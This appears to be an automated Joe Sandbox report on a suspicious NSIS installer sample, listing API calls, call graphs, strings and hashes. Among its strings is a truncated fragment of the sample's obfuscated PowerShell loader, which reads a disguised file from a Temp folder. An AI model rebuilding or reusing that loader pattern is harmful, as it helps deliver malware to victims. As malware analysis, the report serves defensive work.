4698 4014b8 4699 4014be 4698->4699 4700 401389 2 API calls 4699->4700 4701 4014c6 4700->4701 4702 401db9 GetDC 4703 402c1f 17 API calls 4702->4703 4704 401dcb GetDeviceCaps MulDiv ReleaseDC 4703->4704 4705 402c1f 17 API calls 4704->4705 4706 401dfc 4705->4706 4707 4062a6 17 API calls 4706->4707 4708 401e39 CreateFontIndirectW 4707->4708 4709 402592 4708->4709 4710 4043ba 4712 4044ec 4710->4712 4713 4043d2 4710->4713 4711 404556 4714 404620 4711->4714 4715 404560 GetDlgItem 4711->4715 4712->4711 4712->4714 4719 404527 GetDlgItem SendMessageW 4712->4719 4716 4041fb 18 API calls 4713->4716 4721 404262 8 API calls 4714->4721 4717 4045e1 4715->4717 4718 40457a 4715->4718 4720 404439 4716->4720 4717->4714 4726 4045f3 4717->4726 4718->4717 4725 4045a0 SendMessageW LoadCursorW SetCursor 4718->4725 4743 40421d KiUserCallbackDispatcher 4719->4743 4723 4041fb 18 API calls 4720->4723 4724 40461b 4721->4724 4728 404446 CheckDlgButton 4723->4728 4744 404669 4725->4744 4730 404609 4726->4730 4731 4045f9 SendMessageW 4726->4731 4727 404551 4733 404645 SendMessageW 4727->4733 4741 40421d KiUserCallbackDispatcher 4728->4741 4730->4724 4732 40460f SendMessageW 4730->4732 4731->4730 4732->4724 4733->4711 4736 404464 GetDlgItem 4742 404230 SendMessageW 4736->4742 4738 40447a SendMessageW 4739 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4738->4739 4740 404497 GetSysColor 4738->4740 4739->4724 4740->4739 4741->4736 4742->4738 4743->4727 4747 4058b0 ShellExecuteExW 4744->4747 4746 4045cf LoadCursorW SetCursor 4746->4717 4747->4746 4748 40283b 4749 402843 4748->4749 4750 402847 FindNextFileW 4749->4750 4753 402859 4749->4753 4751 4028a0 4750->4751 4750->4753 4754 406284 lstrcpynW 4751->4754 4754->4753

                                                                Control-flow Graph

                                                                [Figure: control-flow graph starting at block 403359-403396 (SetErrorMode, GetVersion); nodes are marked Executed or Not Executed.]
                                                                APIs
                                                                • SetErrorMode.KERNELBASE ref: 0040337C
                                                                • GetVersion.KERNEL32 ref: 00403382
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000020,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                • ExitProcess.KERNEL32 ref: 004036EE
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,"$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                • ExitProcess.KERNEL32 ref: 00403894
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                • String ID: "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S$"C:\Users\user\Desktop\TVPfW4WUdj.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\depersonaliseredes$C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                • API String ID: 3441113951-3063262666
                                                                • Opcode ID: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
                                                                • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                • Opcode Fuzzy Hash: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
                                                                • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

                                                                Control-flow Graph

                                                                [Control-flow graph; entry block 40542b-405446]
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                • GetClientRect.USER32(?,?), ref: 004054D5
                                                                • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                  • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                • ShowWindow.USER32(00000000), ref: 00405624
                                                                • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                • ShowWindow.USER32(00000008), ref: 00405673
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                • CreatePopupMenu.USER32 ref: 004056B8
                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                • EmptyClipboard.USER32 ref: 00405753
                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                • CloseClipboard.USER32 ref: 004057AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                • String ID: {$6B
                                                                • API String ID: 590372296-3705917127
                                                                • Opcode ID: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                • Opcode Fuzzy Hash: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

                                                                Control-flow Graph

                                                                [Control-flow graph; entry block 40698e-406993]
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,75573420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 004065D2
                                                                • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID: 8gB
                                                                • API String ID: 2295610775-1733800166
                                                                • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                APIs
                                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne, xrefs: 004021C3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CreateInstance
                                                                • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne
                                                                • API String ID: 542301482-334597386
                                                                • Opcode ID: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                • Instruction ID: 81793f1010fc2e559759275c5502ec42cf4e228633e8d7c3619733a9a8aee0f9
                                                                • Opcode Fuzzy Hash: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                • Instruction Fuzzy Hash: 34414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID:
                                                                • API String ID: 1974802433-0
                                                                • Opcode ID: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                • Opcode Fuzzy Hash: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A

                                                                Control-flow Graph

                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                • ShowWindow.USER32(?), ref: 00403D7B
                                                                • DestroyWindow.USER32 ref: 00403D8F
                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                • String ID: 6B
                                                                • API String ID: 3282139019-4127139157
                                                                • Opcode ID: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                • Opcode Fuzzy Hash: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000), ref: 004039F5
                                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A93
                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\depersonaliseredes), ref: 00403ADC
                                                                  • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\depersonaliseredes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                • API String ID: 1975747703-3472055290
                                                                • Opcode ID: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                • Instruction ID: 9910424c6ca31f4cc559053cc35dfc0eeb30f3212361bd75bc0ff30566f1833d
                                                                • Opcode Fuzzy Hash: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                • Instruction Fuzzy Hash: C961B870244600BFE630AF269D46F273A6CEB44B49F40057EF985B62E2DB7D5911CA2D

                                                                Control-flow Graph

                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00402EEE
                                                                • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                  • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                  • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                Strings
                                                                • Error launching installer, xrefs: 00402F2D
                                                                • Null, xrefs: 00402FD4
                                                                • "C:\Users\user\Desktop\TVPfW4WUdj.exe", xrefs: 00402EDD
                                                                • soft, xrefs: 00402FCB
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                • Inst, xrefs: 00402FC2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                • API String ID: 4283519449-674568989
                                                                • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

